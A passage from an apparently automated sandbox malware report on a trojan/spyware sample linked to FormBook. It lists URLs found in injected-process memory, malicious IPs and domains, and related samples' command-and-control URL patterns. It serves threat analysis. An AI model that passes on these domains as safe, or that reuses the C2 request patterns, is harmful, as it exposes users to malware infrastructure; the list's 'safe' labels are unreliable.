                                                        unknown
                                                        http://wwk.ydgwy.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwb.goodworldcup.com/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwk.xxthtz.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mirenzhibo.net/rc/27272.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mirenzhibo.net/nqub/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mirenzhibo.net/taxd/63.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwg.moxiuzhibo.cc/tbtgx/8.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wws.bulianhang.com.cn/m/3475.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwd.nvwangzhibo.net/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwg.xy8023.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://m.malazhibo.cc/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mirenzhibo.net/o/15548.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mirenzhibo.net/yy/16.html:;ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://m.meirenzhibo.cc/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mirenzhibo.net/af/639.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwd.0597x.com.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwl.yelangzhibo.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://wwk.xinchazhibo.cn/dmbcr/67.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://wws.cogxgdeyyqv.com/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.mirenzhibo.net/hxmx/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://m.huamizhibo.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.mirenzhibo.net/efia/37.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://wwb.chengsezhibo.cc/anzs/48976.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.ecosia.org/newtab/ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://wwh.lingxizhibo.top/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://m.baimeizhibo.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwf.xiaolajiaozhibo.cn/jv/485.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/ngzb/4.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwh.meirenzhibo.top/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/dyk/45418.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/i/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwh.toluc.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/ja/1497.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/zpkq/2.html:;ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwh.alizhibo.top/b/2.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwk.xingyuzhibo.net/hz/857.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwj.fjtxj.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/pap/5666.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwd.dielianzhibo.cc/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/yge/46643.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwk.xingyuzhibo.cc/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwa.drshool.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwg.alizhibo.cc/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mirenzhibo.net/vzihb/4277.html:;ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wws.vlsabet.com/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.mifengzhibo.cc/n/8.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.lingxizhibo.cc/b/25466.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwd.alizhibo.cc/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwl.ybddc.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwk.900100.cn/vs/73.html:;ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wws.xinghaizhibo.cc/cafu/15511.htmlReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://wwl.svhm.cn/ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            47.83.1.90
                                                            www.gayhxi.infoUnited States
                                                            3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                            194.245.148.189
                                                            www.did-ready.infoGermany
                                                            5517CSLDEtrue
                                                            18.143.155.63
                                                            www.xinchaocjcela.netUnited States
                                                            16509AMAZON-02UStrue
                                                            199.59.243.227
                                                            www.sorket.techUnited States
                                                            395082BODIS-NJUStrue
                                                            84.32.84.32
                                                            promocao.infoLithuania
                                                            33922NTT-LT-ASLTtrue
                                                            162.218.30.235
                                                            www.l40175.xyzUnited States
                                                            62587ANT-CLOUDUStrue
                                                            160.25.166.123
                                                            www.rpa.asiaunknown
                                                            17676GIGAINFRASoftbankBBCorpJPtrue
                                                            109.206.161.15
                                                            www.asianoilporn.xyzNetherlands
                                                            50245SERVEREL-ASNLtrue
                                                            209.74.79.41
                                                            www.daildeals.storeUnited States
                                                            31744MULTIBAND-NEWHOPEUStrue
                                                            104.21.64.208
                                                            www.telepzow.fitUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            202.95.11.110
                                                            www.mirenzhibo.netSingapore
                                                            64050BCPL-SGBGPNETGlobalASNSGtrue
                                                            52.223.13.41
                                                            www.panavet.netUnited States
                                                            8987AMAZONEXPANSIONGBtrue
                                                            156.226.63.13
                                                            www.wuyyv4tq.topSeychelles
                                                            133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1576360
                                                            Start date and time:2024-12-16 22:01:05 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 10m 4s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:7
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@17/13
                                                            EGA Information:
                                                            • Successful, ratio: 66.7%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 47
                                                            • Number of non-executed functions: 278
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target ASmwljQNPNM.exe, PID 3092 because it is empty
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                                                            TimeTypeDescription
                                                            16:02:58API Interceptor11281577x Sleep call for process: ReAgentc.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            194.245.148.189PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                            • www.wine-drinkers.club/hakt/
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • www.maitreyatoys.world/dvmh/
                                                            Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                            • www.wine-drinkers.club/hakt/
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • www.maitreyatoys.world/dvmh/
                                                            Jjfmcz1Hsz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.apidachicago.org/nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX
                                                            Aposporogony.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.apidachicago.org/nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD
                                                            Trubaduren.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.apidachicago.org/nqhc/?yDH=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&mZcHl=r4SlwD8
                                                            PO-JST-270322.exeGet hashmaliciousFormBookBrowse
                                                            • www.swartz.center/cxeo/?W8JpR=NCwLeJ3wUUFynVIDlrIOTEkbUfjyuckEvOuhcnpXuC/VMxxNC9IWNto61Dliak/bDV8d&YT=HhWDab
                                                            Swift copy payment.exeGet hashmaliciousFormBookBrowse
                                                            • www.pillarbox-studio.art/6dmq/?7nUdM=w8L0NF&j2=MsCITNO0KM/cL+AZR5CJ33SxI4+as8/LEdyyeYUf8lcPemOHhyKiBjEDDo5Wf6MgyNVH
                                                            Revised Shipping Documents 385099_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.adornor.online/ns87/?TrThDXL=1XA65DX/vwdZYdcpYm6Xh14zlwfWFzy5EBfmposwpTord/i56WMVSv41xjOrUH7YB88D&GHeTN=f0GDyV1p1diLt
                                                            18.143.155.63Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                            • pleasantinstead.net/index.php
                                                            YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                            • pleasantinstead.net/index.php
                                                            Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                            • returnbottle.net/index.php
                                                            8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                            • pleasantinstead.net/index.php
                                                            YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                            • returnbottle.net/index.php
                                                            66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                            • pleasantinstead.net/index.php
                                                            8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                            • returnbottle.net/index.php
                                                            nnzZhhVIqM.exeGet hashmaliciousUnknownBrowse
                                                            • returnbottle.net/index.php
                                                            66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                            • returnbottle.net/index.php
                                                            PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                            • pleasantinstead.net/index.php
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.wuyyv4tq.topCJE003889.exeGet hashmaliciousFormBookBrowse
                                                            • 156.226.63.13
                                                            www.telepzow.fitPayment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.155.214
